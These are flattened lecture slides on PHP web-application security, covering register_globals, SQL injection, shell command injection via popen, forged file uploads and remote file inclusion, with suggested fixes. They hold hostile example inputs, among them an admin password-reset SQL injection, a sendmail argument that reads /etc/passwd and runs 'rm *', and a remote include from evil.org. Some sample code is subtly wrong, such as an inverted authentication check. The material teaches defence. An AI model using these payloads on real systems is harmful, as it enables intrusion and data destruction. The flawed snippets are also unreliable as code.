PHP SecuritySecure Web ApplicationsBasic RuleGlobal Variable ScopeGlobal Variable Scope (more)Database InteractionCalling External ProgramsFile UploadsFile Uploads (cont.)Include FilesPHP SecurityCS-422(from The Linux JournalOct 2002author: Nuno Lourereio)Secure Web Applications•Most security issues have to do with:–hacker attacks•denial of service•server hijacking –common threats–compromise of dataBasic Rule•Never trust user input–Poorly or unvalidated user input constitutes the most severe security problem with web applications•can crash a server•can cause buffer overflows–can allow machine to be hijacked–allow hacker to have root access–Assume user input is bad until you prove its OKGlobal Variable Scope•In versions of PHP earlier than 4.2.0 many external variables were defaulted to global scope, variables couldn’t be trusted<?php if (authenticate_user()) { $authenticated = true; } … if (!$authenticated) { die (“Authorization required”) }?>If you set $authenticated to 1 via a GET: http://example.com/admin.php?authenticated=1the last test would pass, when it shouldn’tGlobal Variable Scope (more)Since PHP 4.1.0 register_globals has been deprecated; GET, POST, Cookie, Server, Environment and Session variables are no longer in the global scope. There are several new arrays to help developers writing applications:$_GET, $_POST, $COOKIE, $_SERVER, $_ENV, $_REQUEST, $_SESSION<?php $_SESSION[‘authenticated’] = false; if (authenticate_user( )) {$_SESSION[‘authenticated’] = true;} …. If ($_SESSION[‘authenticated’]) { die (“Authorization required”);}?>Database InteractionMost PHP application use data entered from a form to build SQL queries, this can cause a security risk. Assume a script that edits data from some table with a form that POSTs to the same script. The beginning of the script checks to see if the form was submitted then updates the user chosen table.<?php if ($update_table_submit) { $db -> query(“update $table set name=$name); >?>If you don’t validate variable $table it could be set to any table via a GEThttp://examp.com/edit.php?update_table_submit=1&table=users+set+password%3Daaa+where+user%3D%27admin%27%+%23update users set password=aaa where user=“admin” # set name=$nameCalling External ProgramsSometimes you need to call external programs (using system( ), exec( ), popen( ), passthru( ), or the back-tick operator), this is extreemly dangerous if the program name or any of its arguments are based on user input. Instead use escapeshellarg( ) or escapeshellcmd( ) so that users can’t trick the system into executing arbitrary commands.<?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?>The user could control $to to yield:http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2Awhich would result in running the command: /usr/sbin/sendmail -i [email protected] /etc/passwd; rm *a solution would be: $fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);File UploadsUser uploaded file can be a problem because of the way that PHP handles them. PHP will define a variable in the global scope that has the same name as the file input tag in the submitted web form. Then it will create this file with the uploaded file content but not check if the filename is valid or is the uploaded file.<?PHP if ($upload_file && $fn_type = = ‘image/gif’ && $fn_size < 100000) { copy($fn,’images/’); unlink($fn); ?><form method=“POST” name=“fileupload” action=“fupload.php” enctype=“multipart/form-data”>File: <input type=“submit” name=“upload_file” value=“upload”>a malicious user could create his own file specifying the name of some file containing sensitive information and submit it, resulting in the processing of the other file…...File Uploads (cont.)<form method=“POST” name=“fileupload” action=“fupload.php”><input type=“hidden” name=“fn” value=“/var/www/html/index.php”><input type=“hidden” name=“fn_type” value=“text”><input type=“hidden” name=“fn_size” value=“22”><input type=“submit” name=“upload_file” value=“upload”>this would move the file /var/www/html/index.html to /imagesa fix would be:<?php if ($upload_file && $_FILES[‘fn’][‘type’] = = ‘image/gif’ && $_FILES[‘fn’][‘size’] < 100000) { move_uploaded_file($_FILES[‘fn’][‘tmp_name’],’images/’); }?>Include FilesPHP allows you to include files in your script via include( ), include_once( ), requires( ), and requires_once( ). This is convenient and aids maintainability and reuse but is dangerous. Suppose you have a script that includes several HTML file and displays them in the proper layout:<?php include($layout) ?>If someone were to pass the $layout variable through a GET; just think….http://example.com/leftframe.php?layout=/etc/passwd -or-http://example.com/leftframe.php?http://evil.org/nasty.htmlwhere nasty.html contains:<?php passthru(‘rm *’); passthru(‘mail [email protected]